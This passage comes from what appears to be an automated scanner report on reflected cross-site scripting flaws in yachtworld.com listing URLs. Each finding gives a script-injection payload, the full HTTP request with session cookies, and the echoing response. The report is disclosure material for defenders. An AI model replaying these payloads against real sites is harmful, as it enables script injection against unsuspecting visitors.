25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 22:59:47 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1



<html>
<head>
<TITLE>Bluewater Yacht Sales (Hampton, VA)</TITLE>
<META name="keywords" content
...[SNIP]...
<INPUT TYPE="hidden" NAME="office_id" VALUE="7582925d7"><script>alert(1)</script>61a123d4d1a">
...[SNIP]...

3.89. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b36c4"><script>alert(1)</script>0acf81a8360 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-1930392/Toms-Riverb36c4"><script>alert(1)</script>0acf81a8360/NJ/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:52 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 25 Jan 2011 16:08:22 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=1930392%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B99%2C900%5B%25%5DToms+River%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F3%2F0%2F3%2F1930392_8_mini.jpg%3F1282080988000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-1930392%2FToms-River%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:51 GMT
Set-Cookie: VIEWED_BOATS_STORE=1930392%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B99%2C900%5B%25%5DToms+River%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F3%2F0%2F3%2F1930392_8_mini.jpg%3F1282080988000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-1930392%2FToms-River%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=1930392&boat_id=1930392&back=/core/boats/2004/Regulator-32-Fs-1930392/Toms-Riverb36c4"><script>alert(1)</script>0acf81a8360/NJ/United-States&boat_id=1930392">
...[SNIP]...

3.90. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17efc"><script>alert(1)</script>29999bc62e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ17efc"><script>alert(1)</script>29999bc62e/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:04:25 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 25 Jan 2011 16:08:22 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=1930392%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B99%2C900%5B%25%5DToms+River%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F3%2F0%2F3%2F1930392_8_mini.jpg%3F1282080988000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-1930392%2FToms-River%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:04:25 GMT
Set-Cookie: VIEWED_BOATS_STORE=1930392%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B99%2C900%5B%25%5DToms+River%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F3%2F0%2F3%2F1930392_8_mini.jpg%3F1282080988000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-1930392%2FToms-River%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=1930392&boat_id=1930392&back=/core/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ17efc"><script>alert(1)</script>29999bc62e/United-States&boat_id=1930392">
...[SNIP]...

3.91. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db200"><script>alert(1)</script>b62163eb756 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-Statesdb200"><script>alert(1)</script>b62163eb756 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:05:00 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 25 Jan 2011 16:08:22 GMT
Content-Language: en-US
